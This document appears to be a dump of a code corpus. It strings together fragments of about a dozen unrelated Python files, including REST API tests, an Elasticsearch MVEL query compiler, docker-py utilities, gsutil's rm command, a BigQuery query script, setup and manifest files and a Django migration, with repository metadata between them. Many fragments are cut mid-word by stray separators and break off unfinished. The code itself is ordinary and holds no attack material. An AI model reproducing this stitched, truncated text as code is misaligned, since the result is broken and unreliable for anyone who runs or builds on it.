@asynctest
def test_pagination_no_limit(self):
yield from self._a_lot_of_friends()
# list with no limit
r = yield from self._get_json(self.full_url('/friends?limit=0'))
assert r['data']['count'] >= 100
assert r['data']['prev'] == None
assert r['data']['next'] == None
assert r['data']['length'] == r['data']['count']
assert len(r['index']) == r['data']['count']
@asynctest
def test_search_pagination(self):
rnames = list((yield from self._a_lot_of_friends()))
rname = random.choice(rnames).split()[0]
for i in range(5):
name = '{} {}'.format(rname, names.get_last_name())
_, friend = yield from self._create_friend(name=name)
_.close()
rname = rname.lower()
r = yield from self._get_json(
self.full_url('/friends?search={}&limit=1'.format(rname))
)
assert r['data']['count'] >= 1
assert rname in r['data']['next']
while r['data']['next']:
r = yield from self._get_json(r['data']['next'])
if r['data']['next'] is not None:
assert rname in r['data']['next']
assert rname in r['data']['prev']
rname.lower() in r['index'][0]['name'].lower()
@asynctest
def test_oreder_by_ASC(self):
yield from self._a_lot_of_friends()
name = 'Abel Barrera'
_, friend = yield from self._create_friend(name=name)
_.close()
url = self.full_url('/friends?order_by={}'.format('name'))
resp = yield from self._get_json(url)
assert resp['index'][0]['name'].startswith('A')
@asynctest
def test_oreder_by_400(self):
yield from self._a_lot_of_friends()
url = self.full_url('/friends?order_by={}'.format('other'))
resp = yield from self._get(url)
assert resp.status == 400
@asynctest
def test_oreder_by_desc(self):
yield from self._a_lot_of_friends()
defaults = dict(
name='Zarahi zuna'
)
resp = yield from self._create('/friends', defaults)
assert resp.status == 201
resp.close()
url = self.full_url('/friends?order_by={}'.format('-name'))
resp = yield from self._get_json(url)
assert resp['index'][0]['name'].startswith('Z')
class TestBasic(BaseTestCase):
# Test common REST actions
@asynctest
def test_index(self):
resp = yield from self._get(self.full_u
|
rl('/friends'))
assert resp.status == 200
resp.close()
@asynctest
def test_index_json(self):
resp = yield from self._index('/friends')
assert isinstance(resp, dict)
assert 'index' in resp
@asynctest
def test_index_json_condition(self):
resp = yield from self._index('/friends2')
assert isinstance(resp, dict)
assert 'index' in resp
@asynctest
def test_create(self):
name = self._random_string()
_
|
, friend = yield from self._create_friend(name=name)
assert _.status == 201
_.close()
assert friend['name'] == name
assert len(friend.keys()) == 4
efriend = yield from self._delete(friend['url'])
assert efriend.status==200
@asynctest
def test_create_error(self):
_, friend = yield from self._create_friend(wrong_field=123)
assert _.status == 400
_.close()
@asynctest
def test_create_conflict(self):
name = names.get_full_name()
_, friend = yield from self._create_friend(name=name)
_.close()
_, friend = yield from self._create_friend(name=name)
assert _.status == 409
_.close()
@asynctest
def test_update(self):
_, friend = yield from self._create_friend()
_.close()
new_name = self._random_string()
presp = yield from self._patch(friend['url'], name=new_name)
assert presp.status == 204
presp.close()
updated_friend = yield from self._get_json(friend['url'])
assert updated_friend['body']['name'] == new_name
@asynctest
def test_search(self):
name = 'some known name'
_, friend = yield from self._create_friend(name=name)
_.close()
results = yield from self._search('/friends', terms='known name')
assert len(results['index']) > 0
assert results['index'][0]['name'] == name
@asynctest
def test_view_404(self):
resp = yield from self._get(self.full_url('/friends/999999'))
assert resp.status == 404
resp.close()
@asynctest
def test_update_400(self):
_, friend = yield from self._create_friend()
_.close()
new_name = self._random_string()
presp = yield from self._patch(friend['url'], names=new_name)
assert presp.status == 400
presp.close()
@asynctest
def test_update_empty_required_400(self):
_, friend = yield from self._create_friend()
_
|
klahnakoski/esReplicate
|
pyLibrary/queries/es09/expressions.py
|
Python
|
mpl-2.0
| 26,115 | 0.003178 |
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from collections import Mapping
from datetime import datetime
import re
from pyLibrary import convert
from mo_collections import reverse
from mo_logs import Log
from mo_logs.strings import quote
from mo_math import Math
from mo_dots import split_field, Data, Null, join_field, coalesce, listwrap
from mo_times.durations import Duration
class _MVEL(object):
def __init__(self, fromData, isLean=False):
self.fromData = fromData
self.isLean = isLean
self.prefixMap = []
self.functions = {}
def code(self, query):
"""
RETURN THE MVEL THAT WILL FILTER USING query.where AND TERM-PACK THE query.select CLAUSE
"""
selectList = listwrap(query.select)
fromPath = query.frum.name # FIRST NAME IS THE INDEX
sourceVar = "__sourcedoc__"
whereClause = query.where
# PARSE THE fromPath
code = self.frum(fromPath, sourceVar, "__loop")
select = self.select(selectList, fromPath, "output", sourceVar)
body = "var output = \"\";\n" + \
code.replace(
"<CODE>",
"if (" + _where(whereClause, lambda(v): self._translate(v)) + "){\n" +
select.body +
"}\n"
) + \
"output\n"
# ADD REFERENCED CONTEXT VARIABLES
co
|
ntext = self.getFrameVariables(body)
func = UID()
predef = addFunctions(select.head+context+body).head
param = "_source" if body.find(sourceVar) else ""
output = predef + \
select.head + \
context + \
'var ' + func + ' = function('+sourceVar+'){\n' + \
body + \
'};\n' + \
func + '('+param+')\n'
return Compiled(output)
def frum(self, fr
|
omPath, sourceVar, loopVariablePrefix):
"""
indexName NAME USED TO REFER TO HIGH LEVEL DOCUMENT
loopVariablePrefix PREFIX FOR LOOP VARIABLES
"""
loopCode = "if (<PATH> != null){ for(<VAR> : <PATH>){\n<CODE>\n}}\n"
self.prefixMap = []
code = "<CODE>"
path = split_field(fromPath)
# ADD LOCAL VARIABLES
columns = INDEX_CACHE[path[0]].columns
for i, c in enumerate(columns):
if c.name.find("\\.") >= 0:
self.prefixMap.insert(0, {
"path": c.name,
"variable": "get(" + sourceVar + ", \"" + c.name.replace("\\.", ".") + "\")"
})
else:
self.prefixMap.insert(0, {
"path": c.name,
"variable": sourceVar + ".?" + c.name
})
# ADD LOOP VARIABLES
currPath = []
# self.prefixMap.insert(0, {"path": path[0], "variable": path[0]})
for i, step in enumerate(path[1::]):
loopVariable = loopVariablePrefix + str(i)
currPath.append(step)
pathi = ".".join(currPath)
shortPath = self._translate(pathi)
self.prefixMap.insert(0, {"path": pathi, "variable": loopVariable})
loop = loopCode.replace("<VAR>", loopVariable).replace("<PATH>", shortPath)
code = code.replace("<CODE>", loop)
return code
def _translate(self, variableName):
shortForm = variableName
for p in self.prefixMap:
prefix = p["path"]
if shortForm == prefix:
shortForm = p["variable"]
else:
shortForm = replacePrefix(shortForm, prefix + ".", p["variable"] + ".?") # ADD NULL CHECK
shortForm = replacePrefix(shortForm, prefix + "[", p["variable"] + "[")
return shortForm
# CREATE A PIPE DELIMITED RESULT SET
def select(self, selectList, fromPath, varName, sourceVar):
path = split_field(fromPath)
is_deep = len(path) > 1
heads = []
list = []
for s in selectList:
if is_deep:
if s.value and isKeyword(s.value):
shortForm = self._translate(s.value)
list.append("Value2Pipe(" + shortForm + ")\n")
else:
Log.error("do not know how to handle yet")
else:
if s.value and isKeyword(s.value):
list.append("Value2Pipe(getDocValue(" + value2MVEL(s.value) + "))\n")
elif s.value:
shortForm = self._translate(s.value)
list.append("Value2Pipe(" + shortForm + ")\n")
else:
code, decode = self.Parts2Term(s.domain)
heads.append(code.head)
list.append("Value2Pipe(" + code.body + ")\n")
if len(split_field(fromPath)) > 1:
output = 'if (' + varName + ' != "") ' + varName + '+="|";\n' + varName + '+=' + '+"|"+'.join(["Value2Pipe("+v+")\n" for v in list]) + ';\n'
else:
output = varName + ' = ' + '+"|"+'.join(["Value2Pipe("+v+")\n" for v in list]) + ';\n'
return Data(
head="".join(heads),
body=output
)
def Parts2Term(self, domain):
"""
TERMS ARE ALWAYS ESCAPED SO THEY CAN BE COMPOUNDED WITH PIPE (|)
CONVERT AN ARRAY OF PARTS{name, esfilter} TO AN MVEL EXPRESSION
RETURN expression, function PAIR, WHERE
expression - MVEL EXPRESSION
function - TAKES RESULT OF expression AND RETURNS PART
"""
fields = domain.dimension.fields
term = []
if len(split_field(self.fromData.name)) == 1 and fields:
if isinstance(fields, Mapping):
# CONVERT UNORDERED FIELD DEFS
jx_fields, es_fields = zip(*[(k, fields[k]) for k in sorted(fields.keys())])
else:
jx_fields, es_fields = zip(*[(i, e) for i, e in enumerate(fields)])
# NO LOOPS BECAUSE QUERY IS SHALLOW
# DOMAIN IS FROM A DIMENSION, USE IT'S FIELD DEFS TO PULL
if len(es_fields) == 1:
def fromTerm(term):
return domain.getPartByKey(term)
return Data(
head="",
body='getDocValue('+quote(domain.dimension.fields[0])+')'
), fromTerm
else:
def fromTerm(term):
terms = [convert.pipe2value(t) for t in convert.pipe2value(term).split("|")]
candidate = dict(zip(jx_fields, terms))
for p in domain.partitions:
for k, t in candidate.items():
if p.value[k] != t:
break
else:
return p
if domain.type in ["uid", "default"]:
part = {"value": candidate}
domain.partitions.append(part)
return part
else:
return Null
for f in es_fields:
term.append('Value2Pipe(getDocValue('+quote(f)+'))')
return Data(
head="",
body='Value2Pipe('+('+"|"+'.join(term))+')'
), fromTerm
else:
for v in domain.partitions:
term.append("if (" + _where(v.esfilter, lambda x: self._translate(x)) + ") " + value2MVEL(domain.getKey(v)) + "; else ")
term.append(value2MVEL(domain.getKey(domain.NULL)))
func_name = "_temp"+UID()
return self.register_function("+\"|\"+".join(term))
def Parts2TermScript(self, domain):
code, decode = self.Parts2Term(domain)
func = addF
|
mirskytech/djangocms-carousel
|
setup.py
|
Python
|
bsd-3-clause
| 1,241 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
from djangocms_carousel import __version__
INSTALL_REQUIRES = [
]
CLASSIFIERS = [
'Development Status :: 5 - Pr
|
oduction/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Communications',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Message Boards',
|
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
]
setup(
name='djangocms-carousel',
version=__version__,
description='Slider Plugin for django CMS',
author='Andrew Mirsky',
author_email='andrew@mirsky.net',
url='https://git.mirsky.net/mirskyconsulting/djangocms-carousel',
packages=['djangocms_carousel', 'djangocms_carousel.migrations'],
install_requires=INSTALL_REQUIRES,
license='LICENSE.txt',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
long_description=open('README.md').read(),
include_package_data=True,
zip_safe=False
)
|
Novasoft-India/OperERP-AM-Motors
|
openerp/addons/giicourse/__openerp__.py
|
Python
|
agpl-3.0
| 444 | 0.018018 |
{
"name" : "
|
GII",
"version" : "1.0",
"depends" : ['sale','product'],
"author" : "Novasoft Consultancy Services Pvt. Ltd.",
'ca
|
tegory' : 'Generic Modules/Others',
"description": """ GII - Management Module
""",
'website': 'http://www.novasoftindia.com',
'data': ['giisa.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
'application': True,
}
|
bfirsh/docker-py
|
docker/utils/utils.py
|
Python
|
apache-2.0
| 39,231 | 0.000051 |
import base64
import io
import os
import os.path
import json
import shlex
import sys
import tarfile
import tempfile
import warnings
from distutils.version import StrictVersion
from datetime import datetime
from fnmatch import fnmatch
import requests
import six
from .. import constants
from .. import errors
from .. import tls
from ..types import Ulimit, LogConfig, Healthcheck
if six.PY2:
from urllib import splitnport
else:
from urllib.parse import splitnport
DEFAULT_HTTP_HOST = "127.0.0.1"
DEFAULT_UNIX_SOCKET = "http+unix://var/run/docker.sock"
DEFAULT_NPIPE = 'npipe:////./pipe/docker_engine'
BYTE_UNITS = {
'b': 1,
'k': 1024,
'm': 1024 * 1024,
'g': 1024 * 1024 * 1024
}
def create_ipam_pool(subnet=None, iprange=None, gateway=None,
aux_addresses=None):
"""
Create an IPAM pool config dictionary to be added to the
``pool_configs`` parameter of
:py:meth:`~docker.utils.create_ipam_config`.
Args:
subnet (str): Custom subnet for this IPAM pool using the CIDR
notation. Defaults to ``None``.
iprange (str): Custom IP range for endpoints in this IPAM pool using
the CIDR notation. Defaults to ``None``.
gateway (str): Custom IP address for the pool's gateway.
aux_addresses (dict): A dictionary of ``key -> ip_address``
relationships specifying auxiliary addresses that need to be
allocated by the IPAM driver.
Returns:
(dict) An IPAM pool config
Example:
>>> ipam_pool = docker.utils.create_ipam_pool(
subnet='124.42.0.0/16',
iprange='124.42.0.0/24',
gateway='124.42.0.254',
aux_addresses={
'reserved1': '124.42.1.1'
}
)
>>> ipam_config = docker.utils.create_ipam_config(
pool_configs=[ipam_pool])
"""
return {
'Subnet': subnet,
'IPRange': iprange,
'Gateway': gateway,
'AuxiliaryAddresses': aux_addresses
}
def create_ipam_config(driver='default', pool_configs=None):
"""
Create an IPAM (IP Address Management) config dictionary to be used with
:py:meth:`~docker.api.network.NetworkApiMixin.create_network`.
Args:
driver (str): The IPAM driver to use. Defaults to ``default``.
pool_configs (list): A list of pool configuration dictionaries as
created by :py:meth:`~docker.utils.create_ipam_pool`. Defaults to
empty list.
Returns:
(dict) An IPAM config.
Example:
>>> ipam_config = docker.utils.create_ipam_config(driver='default')
>>> network = client.create_network('network1', ipam=ipam_config)
"""
return {
'Driver': driver,
'Config': pool_configs or []
}
def mkbuildcontext(dockerfile):
f = tempfile.NamedTemporaryFile()
t = tarfile.open(mode='w', fileobj=f)
if isinstance(dockerfile, io.StringIO):
dfinfo = tarfile.TarInfo('Dockerfile')
if six.PY3:
raise TypeError('Please use io.BytesIO to create in-memory '
'Dockerfiles with Python 3')
else:
dfinfo.size = len(dockerfile.getvalue())
dockerfile.seek(0)
elif isinstance(dockerfile, io.BytesIO):
dfinfo = tarfile.TarInfo('Dockerfile')
dfinfo.size = len(dockerfile.getvalue())
dockerfile.seek(0)
else:
dfinfo = t.gettarinfo(fileobj=dockerfile, arcname='Dockerfile')
t.addfile(dfinfo, dockerfile)
t.close()
f.seek(0)
return f
def decode_json_header(header):
data = base64.b64decode(header)
if six.PY3:
data = data.decode('utf-8')
return json.loads(data)
def tar(path, exclude=None, dockerfile=None, fileobj=None, gzip=False):
if not fileobj:
fileobj = tempfile.NamedTemporaryFile()
t = tarfile.open(mode='w:gz' if gzip else 'w', fileobj=fileobj)
root = os.path.abspath(path)
exclude = exclude or []
for path in sorted(exclude_paths(root, exclude, dockerfile=dockerfile)):
i = t.gettarinfo(os.path.join(root, path), arcname=path)
if sys.platform == 'win32':
# Windows doesn't keep track of the execute bit, so we make files
# and directories executable by default.
i.mode = i.mode & 0o755 | 0o111
try:
# We open the file object in binary mode for Windows support.
f = open(os.path.join(root, path), 'rb')
except IOError:
# When we encounter a directory the file object is set to None.
f = None
t.addfile(i, f)
t.close()
fileobj.seek(0)
return fileobj
def exclude_paths(root, patterns, dockerfile=None):
"""
Given a root directory path and a list of .dockerignore patterns, return
an iterator of all paths (both regular files and directories) in the root
directory that do *not* match any of the patterns.
All paths returned are relative to the root.
"""
if dockerfile is None:
dockerfile = 'Dockerfile'
exceptions = [p for p in patterns if p.startswith('!')]
include_patterns = [p[1:] for p in exceptions]
include_patterns += [dockerfile, '.dockerignore']
exclude_patterns = list(set(patterns) - set(exceptions))
paths = get_paths(root, exclude_patterns, include_patterns,
has_exceptions=len(exceptions) > 0)
return set(paths).union(
# If the Dockerfile is in a subdirectory that is excluded, get_paths
# will not descend into it and the file will be skipped. This ensures
# it doesn't happen.
set([dockerfile])
if os.path.exists(os.path.join(root, dockerfile)) else set()
)
def should_include(path, exclude_patterns, include_patterns):
"""
Given a path, a list of exclude patterns, and a list of inclusion patterns:
1. Returns True if the path doesn't match any exclusion pattern
2. Returns False if the path matches an exclusion pattern and doesn't match
an inclusion pattern
3. Returns true if the path matches an exclusion pattern and matches an
inclusion pattern
"""
for pattern in exclude_patterns:
if match_path(path, pattern):
for pattern in include_patterns:
if match_path(path, pattern):
return True
return False
return True
def get_paths(root, exclude_patterns, include_patterns, has_exceptions=False):
paths = []
for parent, dirs, files in os.walk(root, topdown=True, followlinks=False):
parent = os.path.relpath(parent, root)
if parent == '.':
parent = ''
# If exception rules exist, we can't skip recursing into ignored
# directories, as we need to look for exceptions in them.
#
# It may be possible to optimize this further for exception patterns
# that *couldn't* match within ignored directores.
#
# This matches the current docker logic (as of 2015-11-24):
# https://github.com/docker/docker/blob/37ba67bf636b34dc5c0c0265d62a089d0492088f/pkg/archive/archive.go#L555-L557
if not has_exceptions:
# Remove excluded patterns from the list of directories to traverse
# by mutating the dirs we're iterating over.
# This looks strange, but is considered the correct way to skip
# traversal. See https://docs.python.org/2/library/os.html#os.walk
dirs[:] = [d for d in dirs if
should_include(os.path.join(parent, d),
|
exclude_patterns, include_patterns)]
for path in dirs:
if should_include(os.path.join(parent, path),
exclude_patterns, include_patterns):
paths.append(os.path.join(parent, path))
for path in files:
if should_include(os.path.join(parent, path),
exclude_patterns, include_patterns):
paths.append(os.path.join(parent, path))
return paths
def match_path(path, patte
|
r
|
openstates/openstates
|
openstates/vi/legislators.py
|
Python
|
gpl-3.0
| 490 | 0.002041 |
from pupa.scrape import Person, Scraper
from openstates.utils import LXMLMixin
class VIPersonScraper(Scraper, LXMLMixin):
def scrape(self, chamber,
|
term):
pass
yield Person()
# home_url = 'http://www.legvi.org/'
# doc =
|
lxml.html.fromstring(self.get(url=home_url).text)
# USVI offers name, island, and biography, but contact info is locked up in a PDF
# //*[@id="sp-main-menu"]/ul/li[2]/div/div/div/div/ul/li/div/div/ul/li/a/span/span
|
Locu/chronology
|
pykronos/tests/conf/django_settings.py
|
Python
|
mit
| 149 | 0 |
KRONOS_MIDDLEWARE = {
'host': 'http://localhost:9191/',
'stream': 'django_middleware',
'blockin
|
g': True,
'log_exception_stack
|
_trace': True
}
|
harishvc/tools
|
bigquery-github/TopGithubRepos.py
|
Python
|
mit
| 4,367 | 0.0158 |
# Query Github public timeline using Bigquery and display top new repositories
# Modified from sources
## https://developers.google.com/bigquery/bigquery-api-quickstart#completecode
## https://gist.github.com/igrigorik/f8742314320e0a4b1a89
import httplib2
import pprint
import sys
import time
import json
import logging
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient import errors
from pprint import pprint
from oauth2client.client import SignedJwtAssertionCredentials
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run
#Debug
# https://developers.google.com/api-client-library/python/guide/logging
#httplib2.debuglevel = 4
#logger = logging.getLogger()
#logger.setLevel(logging.INFO)
def main():
PROJECT_NUMBER = 'xxx' #TODO: Add project number
SERVICE_ACCOUNT_EMAIL = 'xxx@developer.gserviceaccount.com' #TODO: Add service account
f = file('xxx-key.p12', 'rb') #TODO: Add key
key = f.read()
f.close()
credentials = SignedJwtAssertionCredentials(
SERVICE_ACCOUNT_EMAIL,
key,
scope='https://www.googleapis.com/auth/bigquery.readonly')
http = httplib2.Http()
http = credentials.authorize(http)
bigquery_service = build('bigquery', 'v2', http=http)
#https://developers.google.com/bigquery/docs/reference/v2/jobs/query
#https://code.google.com/p/python-sqlparse/
#http://sqlformat.org/
#TODO: Change timestamp
try:
query_request = bigquery_service.jobs()
query_data = {
"kind": "bigquery#job",
'query': 'SELECT repository_url, repository_language, COUNT(repository_name) AS cnt, \
FROM githubarchive:github.timeline \
WHERE TYPE="WatchEvent" \
AND PARSE_UTC_USEC(created_at) >= PARSE_UTC_USEC("2014-08-15 00:00:00") \
AND repository_url IN \
(SELECT repository_url \
FROM githubarchive:github.timeline \
WHERE TYPE="CreateEvent" \
AND PARSE_UTC_USEC(repository_created_at) >= PARSE_UTC_USEC("2014-08-15 00:00:00") \
AND repository_fork = "false" \
AND payload_ref_type = "repository" \
GROUP BY repository_url) \
GROUP BY repository_name, \
|
repository_language, \
repository_description, \
repository_url HAVING cnt >= 5 \
ORDER BY cnt DESC LIMIT 5;',
"useQueryCache": "False" # True or False
}
#Trigger on-demand query
#Quota & Policy info https://developers.google.com/bigquery/quota-policy
query_
|
response = query_request.query(projectId=PROJECT_NUMBER,body=query_data).execute()
#Did the bigquery get processed?
if ((query_response['jobComplete']) and (int(query_response['totalRows']) >1) and (int(query_response['totalBytesProcessed']) > 0 )):
#Store result for further analysis
with open( 'toprepositories.json', 'w' ) as outfile:
json.dump( query_response,outfile)
#Print results
print "Top Repositories in Github"
for row in query_response['rows']:
result_row = []
for field in row['f']:
result_row.append(field['v'])
print('\t'.join(map(str,result_row)))
else:
print "Ignore: jobComplete=%s \t totalRows=%s \t totalBytesProcessed=%s" % (query_response['jobComplete'],query_response['totalRows'], query_response['totalBytesProcessed'])
except HttpError as err:
print "Error:", pprint(err.content)
except AccessTokenRefreshError:
print "Token Error: Credentials have been revoked or expired"
if __name__ == '__main__':
main()
|
fishjord/gsutil
|
gslib/commands/rm.py
|
Python
|
apache-2.0
| 15,054 | 0.004849 |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like rm command for cloud storage providers."""
from __future__ import absolute_import
import time
from gslib.cloud_api import BucketNotFoundException
from gslib.cloud_api import NotEmptyException
from gslib.cloud_api import NotFoundException
from gslib.cloud_api import ServiceException
from gslib.command import Command
from gslib.command import DecrementFailureCount
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.exception import NO_URLS_MATCHED_GENERIC
from gslib.exception import NO_URLS_MATCHED_TARGET
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.parallelism_framework_util import PutToQueueWithTimeout
from gslib.storage_url import StorageUrlFromString
from gslib.thread_message import MetadataMessage
from gslib.translation_helper import PreconditionsFromHeaders
from gslib.util import GetCloudApiInstance
from gslib.util import NO_MAX
from gslib.util import Retry
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil rm [-f] [-r] url...
gsutil rm [-f] [-r] -I
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The gsutil rm command removes objects.
For example, the command:
gsutil rm gs://bucket/subdir/*
will remove all objects in gs://bucket/subdir, but not in any of its
sub-directories. In contrast:
gsutil rm gs://bucket/subdir/**
will remove all objects under gs://bucket/subdir or any of its
subdirectories.
You can also use the -r option to specify recursive object deletion. Thus, for
example, either of the following two commands will remove gs://bucket/subdir
and all objects and subdirectories under it:
gsutil rm gs://bucket/subdir**
gsutil rm -r gs://bucket/subdir
The -r option will also delete all object versions in the subdirectory for
versioning-enabled buckets, whereas the ** command will only delete the live
version of each object in the subdirectory.
Running gsutil rm -r on a bucket will delete all versions of all objects in
the bucket, and then delete the bucket:
gsutil rm -r gs://bucket
If you want to delete all objects in the bucket, but not the bucket itself,
this command will work:
gsutil rm gs://bucket/**
If you have a large number of objects to remove you might want to use the
gsutil -m option, to perform parallel (multi-threaded/multi-processing)
removes:
gsutil -m rm -r gs://my_bucket/subdir
You can pass a list of URLs (one per line) to remove on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to remove objects identified by a program, such as:
some_program | gsutil -m rm -I
The contents of stdin can name cloud URLs and wildcards of cloud URLs.
Note that gsutil rm will refuse to remove files from the local
file system. For example this will fail:
gsutil rm *.txt
WARNING: Object removal cannot be undone. Google Cloud Storage is designed
to give developers a high amount of flexibility and control over their data,
and Google maintains strict controls over the processing and purging of
deleted data. To protect yourself from mistakes, you can configure object
versioning on your bucket(s). See 'gsutil help versions' for details.
<B>DATA RESTORATION FROM ACCIDENTAL DELETION OR OVERWRITES</B>
Google Cloud Storage does not provide support for restoring data lost
or overwritten due to customer errors. If you have concerns that your
application software (or your users) may at some point erroneously delete or
overwrite data, you can protect yourself from that risk by enabling Object
Versioning (see "gsutil help versioning"). Doing so increases storage costs,
which can be partially mitigated by configuring Lifecycle Management to delete
older object versions (see "gsutil help lifecycle").
<B>OPTIONS</B>
-f Continues silently (without printing error messages) despite
errors when removing multiple objects. If some of the objects
could not be removed, gsutil's exit status will be non-zero even
if this flag is set. Execution will still halt if an inaccessible
bucket is encountered. This option is implicitly set when running
"gsutil -m rm ...".
-I Causes gsutil to read the list of objects to remove from stdin.
This allows you to run a program that generates the list of
objects to remove.
-R, -r The -R and -r options are synonymous. Causes bucket or bucket
subdirectory contents (all objects and subdirectories that it
contains) to be removed recursively. If used with a bucket-only
URL (like gs://bucket), after deleting objects and subdirectories
gsutil will delete the bucket. This option implies the -a option
and will delete all object versions.
-a Delete all versions of an object.
""")
def _RemoveExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
if not cls.continue_on_error:
cls.logger.error(str(e))
# TODO: Use shared state to track missing bucket names when we get a
# BucketNotFoundException. Then improve bucket removal logic and exception
# messages.
if isinstance(e, BucketNotFoundException):
cls.bucket_not_found_count += 1
cls.logger.error(str(e))
else:
if _ExceptionMatchesBucketToDelete(cls.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
cls.op_failure_count += 1
# pylint: disable=unused-argument
def _RemoveFoldersExceptionHandler(cls, e):
"""When removing folders, we don't mind if none exist."""
if ((isinstance(e, CommandException) and
NO_URLS_MATCHED_GENERIC in e.reason)
or isinstance(e, NotFoundException)):
DecrementFailureCount()
else:
raise e
def _RemoveFuncWrapper(cls, name_expansion_result, thread_state=None):
cls.RemoveFunc(name_expansion_result, thread_state=thread_state)
def _ExceptionMatchesBucketToDelete(bucket_strings_to_delete, e):
"""Returns True if the exception matches a bucket slated for deletion.
A recursive delete call on an empty bucket will raise an exception when
listing its objects, but if we plan to delete the b
|
ucket that shouldn't
result in a user-visible error.
Args:
bucket_strings_to_delete: Buckets slated for recursive deletion.
e: Exception to check.
Returns:
True if the exception was a no-URLs-matched exception and it matched
one of bucket_strings_to_delete, None otherwise.
"""
if bucket_strings_to_delete:
msg = NO_URLS_MATCHED_TARGET % ''
if msg in str
|
(e):
parts = str(e).split(msg)
return len(parts) == 2 and parts[1] in bucket_strings_to_delete
class RmCommand(Command):
"""Implementation of gsutil rm command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'rm',
command_name_aliases=['del', 'delete', 'remove'],
usage_synopsis=_SYNOPSIS,
min_args=0,
max_args=NO_MAX,
supported_sub_args='afIrR',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
|
adaptive-learning/proso-apps
|
proso_common/management/commands/load_global_custom_config.py
|
Python
|
mit
| 1,269 | 0 |
from django.conf import settings
from django.core.management.base import BaseCommand
from proso_common.models import CustomConfig
import os.path
import yaml
from django.db import transaction
from optparse import make_option
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option(
'-f',
'--file',
dest='filename',
|
default=os.path.join(settings.BASE_DIR, 'proso_custom_config.yaml')
)
|
,
)
def handle(self, *args, **options):
with transaction.atomic():
CustomConfig.objects.filter(user_id=None).delete()
with open(options['filename'], 'r', encoding='utf8') as f:
for app_name, keys in yaml.load(f).items():
for key, records in keys.items():
for record in records:
CustomConfig.objects.try_create(
app_name,
key,
record['value'],
user_id=None,
condition_key=record['condition_key'],
condition_value=record['condition_value']
)
|
boriel/zxbasic
|
src/api/debug.py
|
Python
|
gpl-3.0
| 810 | 0.001235 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:et:
# Simple debugging module
import os
import inspect
from .config import OPTIONS
__all__ = ["__DEBUG__", "__LINE__", "__FILE__"]
# --------------------- END OF GLOBAL FLAGS ----
|
-----------------
def __DEBUG__(msg, level=1):
if level > OPTIONS.debug_level:
return
line = inspect.getouterframes(inspect.currentframe())[1][2]
fname = os.path.basename(inspect.getouterframes(inspect.currentframe())[1][1])
OPTIONS.stderr.write("debug: %s:%i %s\n" % (fname, line, msg))
def __LINE__():
"""Returns current file interpreter line"""
return inspect.getouterframes(inspect.currentframe())[1][2]
def __FILE__():
"""Returns c
|
urrent file interpreter line"""
return inspect.currentframe().f_code.co_filename
|
hackultura/procult
|
procult/core/migrations/0004_auto_20160905_0938.py
|
Python
|
gpl-2.0
| 1,233 | 0.001622 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def port_models(apps, schema_editor):
Proposal = apps.get_model('core', 'Proposal')
Notice = apps.get_model('core', 'Notice')
n = Notice()
n.title = "Edital"
n.description = "Edital info"
n.save()
for p in Proposal.objects.all():
p.notice = n
p.save()
def reverse_port_models(apps, schema_editor):
pas
|
s
class Migration(migrations.Migration):
dependencies = [
('core', '0003_proposaldate'),
]
operations = [
migrati
|
ons.CreateModel(
name='Notice',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('title', models.CharField(max_length=60)),
('description', models.CharField(max_length=500)),
('is_available', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='proposal',
name='notice',
field=models.ForeignKey(related_name='proposals', to='core.Notice', null=True),
),
migrations.RunPython(port_models, reverse_port_models),
]
|
aroth-arsoft/arsoft-python
|
python3/arsoft/efi/__init__.py
|
Python
|
gpl-3.0
| 4,063 | 0.006153 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
"""This module provides a general interface to EFI variables using platform-
specific methods. Current Windows and Linux (with sysfs and efivars) are
supported.
Under Windows the pywin32 extensions are required.
